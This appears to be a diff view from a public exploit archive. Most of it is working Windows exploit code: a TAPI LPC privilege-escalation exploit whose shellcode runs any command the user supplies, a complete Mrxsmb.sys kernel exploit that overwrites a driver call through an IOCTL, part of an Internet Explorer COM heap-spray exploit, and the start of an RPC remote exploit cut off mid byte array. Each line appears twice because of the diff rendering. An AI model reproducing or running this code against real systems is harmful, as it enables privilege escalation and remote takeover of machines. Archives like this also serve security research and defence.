} OBJDIR_INFORMATION; } OBJDIR_INFORMATION;
typedef struct _OBJECT_ATTRIBUTES { typedef struct _OBJECT_ATTRIBUTES {
ULONG Length; ULONG Length;
HANDLE RootDirectory; HANDLE RootDirectory;
UNICODE_STRING *ObjectName; UNICODE_STRING *ObjectName;
ULONG Attributes; ULONG Attributes;
PVOID SecurityDescriptor; PVOID SecurityDescriptor;
PVOID SecurityQualityOfService; PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES; } OBJECT_ATTRIBUTES;
#define InitializeObjectAttributes( p, n, a, r, s ) { \ #define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \ (p)->RootDirectory = r; \
(p)->Attributes = a; \ (p)->Attributes = a; \
(p)->ObjectName = n; \ (p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \ (p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \ (p)->SecurityQualityOfService = NULL; \
} }
WCHAR * uString=(WCHAR *) HeapAlloc(GetProcessHeap(), 0, 0x100); WCHAR * uString=(WCHAR *) HeapAlloc(GetProcessHeap(), 0, 0x100);
LPVOID lpLocalAddress,lpTargetAddress; LPVOID lpLocalAddress,lpTargetAddress;
DWORD ConnectToLPCPort(){ DWORD ConnectToLPCPort(){
HMODULE hNtdll; HMODULE hNtdll;
HANDLE hPort; HANDLE hPort;
LPCSECTIONINFO sectionInfo; LPCSECTIONINFO sectionInfo;
LPCSECTIONMAPINFO mapInfo; LPCSECTIONMAPINFO mapInfo;
byte ConnectDataBuffer[100]; byte ConnectDataBuffer[100];
DWORD Size = sizeof(ConnectDataBuffer); DWORD Size = sizeof(ConnectDataBuffer);
WCHAR * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port WCHAR * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port
DWORD i; DWORD i;
UNICODE_STRING uStr; UNICODE_STRING uStr;
for (i=0;i<100;i++) for (i=0;i<100;i++)
ConnectDataBuffer[i]=0x0; ConnectDataBuffer[i]=0x0;
hNtdll=LoadLibrary("ntdll.dll"); hNtdll=LoadLibrary("ntdll.dll");
DWORD (WINAPI * pfnNtConnectPort)(HANDLE*,UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*); DWORD (WINAPI * pfnNtConnectPort)(HANDLE*,UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*);
pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort"); pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort");
DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD); DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD);
pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection"); pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection");
HANDLE hSection; HANDLE hSection;
LARGE_INTEGER SecSize; LARGE_INTEGER SecSize;
DWORD maxSize=0; DWORD maxSize=0;
SecSize.LowPart=0x1000; SecSize.LowPart=0x1000;
SecSize.HighPart=0x0; SecSize.HighPart=0x0;
SECURITY_QUALITY_OF_SERVICE qos; SECURITY_QUALITY_OF_SERVICE qos;
DWORD qosSize=4; DWORD qosSize=4;
qos.Length =(DWORD)&qosSize; qos.Length =(DWORD)&qosSize;
qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2; qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2;
qos.ContextTrackingMode =0x01000101; qos.ContextTrackingMode =0x01000101;
qos.EffectiveOnly =0x10000; qos.EffectiveOnly =0x10000;
//create shared section //create shared section
pfnCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL); pfnCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL);
memset(&sectionInfo, 0, sizeof(sectionInfo)); memset(&sectionInfo, 0, sizeof(sectionInfo));
memset(&mapInfo, 0, sizeof(mapInfo)); memset(&mapInfo, 0, sizeof(mapInfo));
sectionInfo.Length = 0x18; sectionInfo.Length = 0x18;
sectionInfo.SectionHandle =hSection; sectionInfo.SectionHandle =hSection;
sectionInfo.SectionSize = SHARED_SECTION_SIZE; sectionInfo.SectionSize = SHARED_SECTION_SIZE;
mapInfo.Length = 0x0C; mapInfo.Length = 0x0C;
uStr.Length = wcslen(uString)*2; uStr.Length = wcslen(uString)*2;
uStr.MaximumLength = wcslen(uString)*2+2; uStr.MaximumLength = wcslen(uString)*2+2;
uStr.Buffer =uString; uStr.Buffer =uString;
//connect to LPC port //connect to LPC port
if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){ if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){
lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ; lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ;
lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ; lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ;
return 1; return 1;
} }
return 0; return 0;
} }
int main(int argc, char* argv[]) int main(int argc, char* argv[])
{ {
HMODULE hKernel; HMODULE hKernel;
DWORD iStrLen; DWORD iStrLen;
FARPROC pWinExec,pExitThread; FARPROC pWinExec,pExitThread;
LPSTR sCommand; LPSTR sCommand;
if (!argv[1]) { if (!argv[1]) {
printf("\nUsage :\n TapiExploit \"command\" \n"); printf("\nUsage :\n TapiExploit \"command\" \n");
printf("\nExample :\n TapiExploit \"cmd.exe\" \n"); printf("\nExample :\n TapiExploit \"cmd.exe\" \n");
exit(0); exit(0);
} }
iStrLen=strlen(argv[1]); iStrLen=strlen(argv[1]);
if(iStrLen>=65){ if(iStrLen>=65){
printf("\n\"command\" must be less than 65 chars.\n"); printf("\n\"command\" must be less than 65 chars.\n");
exit(0); exit(0);
} }
sCommand=argv[1]; sCommand=argv[1];
if (!ConnectToLPCPort()){ //connect to TAPI LPC port if (!ConnectToLPCPort()){ //connect to TAPI LPC port
printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again."); printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again.");
exit(0); exit(0);
} }
hKernel=LoadLibrary("Kernel32.dll"); hKernel=LoadLibrary("Kernel32.dll");
// pWinExec=GetProcAddress(hKernel,"WinExec"); // pWinExec=GetProcAddress(hKernel,"WinExec");
pWinExec=GetProcAddress(hKernel,"CreateProcessA"); pWinExec=GetProcAddress(hKernel,"CreateProcessA");
pExitThread=GetProcAddress(hKernel,"ExitThread"); pExitThread=GetProcAddress(hKernel,"ExitThread");
CHAR sWinSta[]="WinSta0\\Default"; CHAR sWinSta[]="WinSta0\\Default";
//copy shellcode //copy shellcode
_asm { _asm {
pushad pushad
lea esi, Shellcode lea esi, Shellcode
mov edi, lpLocalAddress mov edi, lpLocalAddress
add edi, 0x10 add edi, 0x10
lea ecx, End lea ecx, End
sub ecx, esi sub ecx, esi
push esi push esi
push edi push edi
cld cld
rep movsb rep movsb
pop edi pop edi
pop esi pop esi
push edi push edi
lea ecx, CommandBuf lea ecx, CommandBuf
sub ecx, esi sub ecx, esi
add edi, ecx add edi, ecx
mov esi, sCommand mov esi, sCommand
mov ecx, iStrLen mov ecx, iStrLen
rep movsb rep movsb
mov [edi], 0x00 mov [edi], 0x00
pop edi pop edi
mov esi, pWinExec mov esi, pWinExec
mov [edi+0x0a], esi mov [edi+0x0a], esi
mov esi, pExitThread mov esi, pExitThread
mov [edi+0x0e], esi mov [edi+0x0e], esi
////////////// //////////////
add edi, 0x2f0 add edi, 0x2f0
lea esi, sWinSta lea esi, sWinSta
mov ecx, 0xf mov ecx, 0xf
cld cld
rep movsb rep movsb
/////////////// ///////////////
jmp Done jmp Done
Shellcode: Shellcode:
jmp Start jmp Start
// this gets overwritten // this gets overwritten
mov ax,0xffff mov ax,0xffff
mov ax,0xffff mov ax,0xffff
mov ax,0xffff mov ax,0xffff
mov ax,0xffff mov ax,0xffff
CommandBuf: // this gets overwritten CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555
Start: Start:
call getDelta call getDelta
getDelta: getDelta:
pop edx // Get shellcode/shared section pointer pop edx // Get shellcode/shared section pointer
push edx push edx
/* push 0x1 // push 0x0 for hidden window /* push 0x1 // push 0x0 for hidden window
lea eax, [edx-0x47] lea eax, [edx-0x47]
push eax // Command offset push eax // Command offset
call [edx-0x4f] // Call WinExec call [edx-0x4f] // Call WinExec
*/ */
mov eax, edx mov eax, edx
add eax,0x500 add eax,0x500
push eax //LPPROCESS_INFORMATION push eax //LPPROCESS_INFORMATION
add eax, 0x100 add eax, 0x100
mov ebx, edx mov ebx, edx
xor bl, bl xor bl, bl
lea ecx, [ebx+0x300] lea ecx, [ebx+0x300]
lea ebx, [eax+0x8] lea ebx, [eax+0x8]
mov [ebx], ecx //set windows station and desktop mov [ebx], ecx //set windows station and desktop
push eax //LPSTARTUPINFO push eax //LPSTARTUPINFO
push 0x0 push 0x0
push 0x0 push 0x0
push 0x0 push 0x0
push 0x0 push 0x0
push 0x0 push 0x0
push 0x0 push 0x0
lea eax, [edx-0x47] lea eax, [edx-0x47]
push eax // Command offset push eax // Command offset
push 0x0 push 0x0
call [edx-0x4f] // Call create process call [edx-0x4f] // Call create process
pop edx pop edx
call [edx-0x4b] // Call ExitThread call [edx-0x4b] // Call ExitThread
End: End:
Done: Done:
popad popad
} }
LPSTR lpszAppFilename=(LPSTR )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ; LPSTR lpszAppFilename=(LPSTR )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ;
LINEEXTENSIONID ExtensionID; LINEEXTENSIONID ExtensionID;
memset(lpszAppFilename,0x58,0x21A); memset(lpszAppFilename,0x58,0x21A);
_asm{ _asm{
pushad pushad
mov ebx, lpszAppFilename mov ebx, lpszAppFilename
lea ebx, [ebx+0x216] lea ebx, [ebx+0x216]
mov eax, lpTargetAddress mov eax, lpTargetAddress
add eax, 0x10 add eax, 0x10
mov [ebx], eax mov [ebx], eax
popad popad
} }
lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL,&ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL); lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL,&ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL);
Sleep(1000); Sleep(1000);
printf("Command should have been executed ;)\n"); printf("Command should have been executed ;)\n");
return 0; return 0;
} }
// milw0rm.com [2006-03-14] // milw0rm.com [2006-03-14]

464
platforms/windows/local/1911.c
View file

@ -1,232 +1,232 @@
/////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////
// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005) // Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4 // Tested on XP SP2 && 2K SP4
// Disable ReadOnly Memory protection // Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0 // HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES. // ONLY FOR EDUCATIONAL PURPOSES.
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// Rubén Santamarta. // Rubén Santamarta.
// www.reversemode.com // www.reversemode.com
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// OVERVIEW // OVERVIEW
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// There are 3 possible values to change in order to adjust the exploit to other versions. // There are 3 possible values to change in order to adjust the exploit to other versions.
// # XPSP2 (XP Service Pack 2) // # XPSP2 (XP Service Pack 2)
// This variable is equal to the File offset of the Call that we are modifying minus 0xC // This variable is equal to the File offset of the Call that we are modifying minus 0xC
//. #XPSP2 => 3D88020000 cmp eax,000000288 //. #XPSP2 => 3D88020000 cmp eax,000000288
//. 770B ja .000064BBE -- //. 770B ja .000064BBE --
//. 50 push eax //. 50 push eax
//. 51 push ecx //. 51 push ecx
//. E812E2FFFF call .000062DCC -- MODIFIED CALL -- //. E812E2FFFF call .000062DCC -- MODIFIED CALL --
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// #W2KSP4 (Windows 2000 Service Pack 4) // #W2KSP4 (Windows 2000 Service Pack 4)
// The same method previosly explained but regarding to Windows 2000 Service Pack 4. // The same method previosly explained but regarding to Windows 2000 Service Pack 4.
// ----------------------------------------------------------------------------------- // -----------------------------------------------------------------------------------
// $OffWord // $OffWord
// This variable is defined in CalcJump() Function. // This variable is defined in CalcJump() Function.
// E812E2FFFF call .000062DCC -- MODIFIED CALL -- // E812E2FFFF call .000062DCC -- MODIFIED CALL --
// The exploit calculates automatically the relative jump, but we need to provide it // The exploit calculates automatically the relative jump, but we need to provide it
// the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP // the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP
// OffWord will be equal to 0xE212. // OffWord will be equal to 0xE212.
////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////
#include <windows.h> #include <windows.h>
#include <stdio.h> #include <stdio.h>
#define XPSP2 0x54BAC #define XPSP2 0x54BAC
#define W2KSP4 0x50ADD #define W2KSP4 0x50ADD
#define MAGIC_IOCTL 0x141043 #define MAGIC_IOCTL 0x141043
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*, typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD , DWORD ,
LPDWORD); LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase, typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
LPTSTR lpBaseName, LPTSTR lpBaseName,
DWORD nSize); DWORD nSize);
VOID ShowError() VOID ShowError()
{ {
LPVOID lpMsgBuf; LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM, FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL, NULL,
GetLastError(), GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf, (LPTSTR) &lpMsgBuf,
0, 0,
NULL); NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0); MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1); exit(1);
} }
DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr) DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{ {
DWORD SumTemp; DWORD SumTemp;
DWORD IniAddress; DWORD IniAddress;
DWORD i; DWORD i;
DWORD sumAux; DWORD sumAux;
DWORD addTemp; DWORD addTemp;
DWORD OffWord; DWORD OffWord;
if(InXP) if(InXP)
{ {
SumTemp=BaseMRX+XPSP2+0xE; SumTemp=BaseMRX+XPSP2+0xE;
OffWord=0xE212; OffWord=0xE212;
} }
else else
{ {
SumTemp=BaseMRX+W2KSP4+0xE; SumTemp=BaseMRX+W2KSP4+0xE;
OffWord=0xa971; OffWord=0xa971;
} }
for(i=0x4c;i<0xDDDC;i=i+4) for(i=0x4c;i<0xDDDC;i=i+4)
{ {
sumAux=~((i*0x10000)+OffWord); sumAux=~((i*0x10000)+OffWord);
addTemp=SumTemp-sumAux; addTemp=SumTemp-sumAux;
if(addTemp>0xE000000 && addTemp<0xF000000){ if(addTemp>0xE000000 && addTemp<0xF000000){
IniAddress=addTemp&0xFFFFF000; IniAddress=addTemp&0xFFFFF000;
*hValue=i-4; *hValue=i-4;
*ShellAddr=addTemp; *ShellAddr=addTemp;
break; break;
} }
} }
printf("\nINFORMATION \n"); printf("\nINFORMATION \n");
printf("-----------------------------------------------------\n"); printf("-----------------------------------------------------\n");
printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp); printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp);
return (IniAddress); return (IniAddress);
} }
int main(int argc, char *argv[]) int main(int argc, char *argv[])
{ {
PENUMDEVICES pEnumDeviceDrivers; PENUMDEVICES pEnumDeviceDrivers;
PGETDEVNAME pGetDeviceDriverBaseName; PGETDEVNAME pGetDeviceDriverBaseName;
LPVOID arrMods[200],addEx; LPVOID arrMods[200],addEx;
DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0; DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0;
DWORD *OutBuff,*InBuff; DWORD *OutBuff,*InBuff;
HANDLE hDevice; HANDLE hDevice;
BOOL InXP; BOOL InXP;
CHAR baseName[255]; CHAR baseName[255];
CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)" CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)"
if(argc<2) if(argc<2)
{ {
printf("\nMRXSMB.SYS RING0 Exploit\n"); printf("\nMRXSMB.SYS RING0 Exploit\n");
printf("--- Ruben Santamarta ---\n"); printf("--- Ruben Santamarta ---\n");
printf("Tested on XPSP2 & W2KSP4\n"); printf("Tested on XPSP2 & W2KSP4\n");
printf("\nusage> exploit.exe <XP> or <2K>\n"); printf("\nusage> exploit.exe <XP> or <2K>\n");
exit(1); exit(1);
} }
if(strncmp(argv[1],"XP",2)==0) if(strncmp(argv[1],"XP",2)==0)
InXP=TRUE; InXP=TRUE;
else else
InXP=FALSE; InXP=FALSE;
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"), pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers"); "EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"), pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA"); "GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb); pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID); devNum=cb/sizeof(LPVOID);
printf("\nSearching Mrxsmb.sys Base Address..."); printf("\nSearching Mrxsmb.sys Base Address...");
for(i=1;i<=devNum;i++) for(i=1;i<=devNum;i++)
{ {
pGetDeviceDriverBaseName(arrMods[i],baseName,254); pGetDeviceDriverBaseName(arrMods[i],baseName,254);
if((strncmp(baseName,"mrxsmb",6)==0)) if((strncmp(baseName,"mrxsmb",6)==0))
{ {
printf("[%x] Found!\n",arrMods[i]); printf("[%x] Found!\n",arrMods[i]);
BaseMRX=(DWORD)arrMods[i]; BaseMRX=(DWORD)arrMods[i];
} }
} }
if(!BaseMRX) if(!BaseMRX)
{ {
printf("Not Found\nExiting\n\n"); printf("Not Found\nExiting\n\n");
exit(1); exit(1);
} }
addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr); addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError(); if(!OutBuff) ShowError();
printf("F000h bytes allocated at \t\t [0x%p]\n",addEx); printf("F000h bytes allocated at \t\t [0x%p]\n",addEx);
printf("Value needed \t\t\t [0x%p]\n",hValue+4); printf("Value needed \t\t\t [0x%p]\n",hValue+4);
InBuff=OutBuff; InBuff=OutBuff;
printf("Checking Shadow Device..."); printf("Checking Shadow Device...");
hDevice = CreateFile("\\\\.\\shadow", hDevice = CreateFile("\\\\.\\shadow",
FILE_EXECUTE, FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, NULL,
OPEN_EXISTING, OPEN_EXISTING,
0, 0,
NULL); NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError(); if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]\n"); printf("[OK]\n");
printf("Querying Device...\n"); printf("Querying Device...\n");
while(OutBuff[3]< hValue) while(OutBuff[3]< hValue)
{ {
DeviceIoControl(hDevice, // "\\.\shadow" DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned &junk, // bytes returned
(LPOVERLAPPED) NULL); (LPOVERLAPPED) NULL);
printf("\r\t[->]VALUES: (%x)",OutBuff[3]); printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
} }
if(InXP) if(InXP)
Ring0Addr=BaseMRX+XPSP2; Ring0Addr=BaseMRX+XPSP2;
else else
Ring0Addr=BaseMRX+W2KSP4; Ring0Addr=BaseMRX+W2KSP4;
printf("Overwritting Driver Call at[%x]...",Ring0Addr); printf("Overwritting Driver Call at[%x]...",Ring0Addr);
DeviceIoControl(hDevice, // "\\.\shadow" DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x (LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned &junk, // bytes returned
(LPOVERLAPPED) NULL); (LPOVERLAPPED) NULL);
printf("[OK]\n"); printf("[OK]\n");
for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090; for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090;
memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode)); memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("Sending IOCTL to execute the ShellCode\n"); printf("Sending IOCTL to execute the ShellCode\n");
DeviceIoControl(hDevice, // "\\.\shadow" DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned &junk, // bytes returned
(LPOVERLAPPED) NULL); (LPOVERLAPPED) NULL);
dwTemp=CloseHandle(hDevice); dwTemp=CloseHandle(hDevice);
if(!dwTemp) ShowError(); if(!dwTemp) ShowError();
dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT); dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT);
if(!dwTemp) ShowError(); if(!dwTemp) ShowError();
return(1); return(1);
} }
// milw0rm.com [2006-06-14] // milw0rm.com [2006-06-14]

6
platforms/windows/local/352.c
View file

@ -177,6 +177,6 @@ int main(int argc, char* argv[])
SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close utilitymanager SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close utilitymanager
return 0; return 0;
} }
// milw0rm.com [2004-07-17] // milw0rm.com [2004-07-17]

6
platforms/windows/remote/1144.html
View file

@ -138,6 +138,6 @@ for (i=0;i<750;i++) memory[i] = block + shellcode;
</SCRIPT> </SCRIPT>
<object classid="CLSID:3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5"></object> <object classid="CLSID:3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5"></object>
Microsoft Internet Explorer blnmgr.dll COM Object Remote Exploit Microsoft Internet Explorer blnmgr.dll COM Object Remote Exploit
# milw0rm.com [2005-08-09] # milw0rm.com [2005-08-09]

794
platforms/windows/remote/1352.cpp
View file

@ -1,397 +1,397 @@
/* /*
Hard to exploit, isn't it? I have tested it on 10+ box, most of them allocated 0x9X0058 for Hard to exploit, isn't it? I have tested it on 10+ box, most of them allocated 0x9X0058 for
me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be
divided exactly by 8 (merde), so I choose 0x684191c4. divided exactly by 8 (merde), so I choose 0x684191c4.
This following program is mostly like a D.O.S. 10+ blackbox were tested, only 5 were owned, This following program is mostly like a D.O.S. 10+ blackbox were tested, only 5 were owned,
and I think the successful rate should be much lower in real circumstance. and I think the successful rate should be much lower in real circumstance.
I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is
said that this fault could be steered clear of and another segfault is consequently triggered, said that this fault could be steered clear of and another segfault is consequently triggered,
so... so...
Any mails are welcome but spam, I need NO viagra. Je suis celibataire. Any mails are welcome but spam, I need NO viagra. Je suis celibataire.
Greetz: Greetz:
All SST guys, I love your bald heads that never hatted. All SST guys, I love your bald heads that never hatted.
Shuo Yang, I love you. Shuo Yang, I love you.
OYXin, ... OYXin, ...
Code by: Code by:
Swan (Swan[at]0x557[dot]org) Swan (Swan[at]0x557[dot]org)
*/ */
#include <stdio.h> #include <stdio.h>
#include <winsock2.h> #include <winsock2.h>
#include <windows.h> #include <windows.h>
#pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "ws2_32.lib")
char peer0_0[72] = { char peer0_0[72] = {
(char)0x05, (char)0x00, (char)0x0b, (char)0x03, (char)0x10, (char)0x00, (char)0x00, (char)0x00, (char)0x05, (char)0x00, (char)0x0b, (char)0x03, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x48, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x48, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0xd0, (char)0x16, (char)0xd0, (char)0x16, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0xd0, (char)0x16, (char)0xd0, (char)0x16, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10, (char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda, (char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x04, (char)0x5d, (char)0x88, (char)0x8a, (char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x04, (char)0x5d, (char)0x88, (char)0x8a,
